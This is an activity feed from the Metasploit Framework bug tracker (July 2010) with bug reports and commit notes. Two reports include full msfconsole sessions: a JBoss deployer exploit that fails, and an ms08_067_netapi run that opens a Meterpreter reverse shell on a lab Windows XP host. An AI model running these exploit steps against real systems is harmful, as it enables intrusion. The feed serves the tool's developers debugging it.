Metasploit Framework: Activity

Bug #2312 (New): jboss_maindeployer - undefined method `peerhost' for [Msf::Module::Platform::Win...

2010-07-30T16:52:26-07:00

Hello, this is my first post and I hope that this could help improving metasploit.
It is about jboss mail deployer. I am able to exploit this hole and send a payload to the deployer manually, but not using metasploit.

This is the scenario:

msf exploit(jboss_maindeployer) > show options

Module options:

Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   APPBASE                    no        Application base name, (default: random)
   JSP                        no        JSP name to use without .jsp extension (default: random)
   PASSWORD                   no        The password for the specified username
   PATH      /jmx-console     yes       The URI path of the console
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.9      yes       The target address
   RPORT     80               yes       The target port
   SHELL     automatic        no        The system shell to use
   SRVHOST   192.168.1.100    yes       The local host to listen on.
   SRVPORT   8080             yes       The local port to listen on.
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME                   no        The username to authenticate as
   VERB      POST             yes       The HTTP verb to use (for CVE-2010-0738)
   VHOST                      no        HTTP server virtual host
   WARHOST                    no        The host to request the WAR payload from

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.1.100    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

Id  Name
   --  ----
   0   Automatic

msf exploit(jboss_maindeployer) > exploit

[*] Started reverse handler on 192.168.1.100:4444
[*] Attempting to automatically select a target...
[*] Attempting to automatically detect the platform...
[*] Automatically selected target "Windows Universal"
[-] Exploit exception: undefined method `peerhost' for [Msf::Module::Platform::Windows]:Array
[*] Exploit completed, but no session was created.

If you need more informations, just ask me.
Thanks.

Bug #2310: ms08_067_netapi and some others exploit does nor wotk since rev9914

2010-07-29T11:17:16-07:00

Seen this too - not sure of exact revision it stopped - but during the last week most likely

Bug #2311 (New): ibm_tsm_cad_ping currently classified as windows only

2010-07-29T10:27:51-07:00

From what I can tell, I have come across some vulnerable HPUX systems that are running a vulnerable tivoli storage manager client. It appears as though the exploit is successful, but I'm unable to attach a payload of a unix flavor because the exploit is currently listed in the windows branch. I'd like to either see if there is a way to override the "not a compatible payload" error to fully test this or if it might be possible to see if the exploit does actually work on non-windows systems, and get it classified a bit differently. Please accept my apologies if this is simply my own ignorance. I did google a bit to try and find answers on my own.

Bug #2310 (New): ms08_067_netapi and some others exploit does nor wotk since rev9914

2010-07-29T09:19:35-07:00

Hi,

Since Rev 9914 I'm not able to trigger anymore ms08_067_netapi exploit against a vulnerable test computer . below a small screen dump :

kill_tinnitus:/opt/metasploit/framework3/trunk# ./msfconsole

_ | | o
_ _ _ _ |_ _, , _ | | _ _|
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |

		_/	__/	/\/	_/ \/	__/	/\/	_/	_/ /	\

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 568 exploits - 292 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9913 updated 7 days ago (2010.07.22)

mssf >
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.30.11
RHOST => 192.168.30.11
msf exploit(ms08_067_netapi) > set LHOST 192.168.30.1
LHOST => 192.168.30.1
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.30.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:French
[*] Selected Target: Windows XP SP2 French (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748032 bytes) to 192.168.30.11
[*] Meterpreter session 1 opened (192.168.30.1:4444 -> 192.168.30.11:1031) at Thu Jul 29 17:11:27 +0200 2010

meterpreter > exit

[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(ms08_067_netapi) > exit
kill_tinnitus:/opt/metasploit/framework3/trunk# svn up

......

kill_tinnitus:/opt/metasploit/framework3/trunk# ./msfconsole

o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 574 exploits - 292 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9942 updated today (2010.07.29)

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.30.1
LHOST => 192.168.30.1
msf exploit(ms08_067_netapi) > set RHOST 192.168.30.11
RHOST => 192.168.30.11
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.30.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:French
[*] Selected Target: Windows XP SP2 French (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

Revision 9942: initial lab plugin commit

2010-07-28T20:50:59-07:00

Revision 9941: updated lab controller

2010-07-28T20:50:31-07:00

Bug #2309 (New): -cl vs -c in multiscript.rb

2010-07-28T18:17:41-07:00

In opts.parse, the case is "-c":

when "-c" 
                commands = val.gsub(/;/,"\n")

But in exec_opts, the case is "-cl":

"-cl" => [ true,"Collection of scripts to execute. Each script command must be enclosed in double quotes and separated by a semicolon."],

So the script should be changed like:

45,46c45
<
< when "-c"
---

when "-cl"

Revision 9940: Changing logic for the VRFY test.

2010-07-27T15:12:18-07:00

Revision 9939: move the stdapi constants into the stdapi extension to save a little space when ph...

2010-07-27T14:16:15-07:00

Revision 9938: remove debug prints

2010-07-27T14:05:41-07:00

Bug #1158: db_add_host throws stack trace - undefined method `created_at'

2010-07-27T11:05:17-07:00

I figured it out for anyone who has this problem in the future. In my.cnf skip-networking was uncommented. I commented that out and now there are no problems.

Bug #2307: lib/rex/elfparsey/elfbase.rb bug

2010-07-27T11:04:22-07:00

Good eye, thanks for letting us know!

Bug #2307 (Resolved): lib/rex/elfparsey/elfbase.rb bug

2010-07-27T11:03:55-07:00

Applied in changeset r9937.

Revision 9937: remove duped p_filesz entry, fixes #2307

2010-07-27T11:03:18-07:00

Bug #2308 (Assigned): cmd/printf_util produces incorrect code

2010-07-27T10:56:35-07:00

Indeed it will not work in bash/sh. The reason that this does not escape backslashes is that it was created for a php exploit that has magic_quotes_gpc turned on. Therefore, before getting executed it would become "printf${IFS}\\x30" which does work.

I open to other ideas for names, etc, for this encoder so that the exploit using it can continue to function... Perhaps we should just move it into the exploit itself as it may be a special enough case (super old system) to warrant that..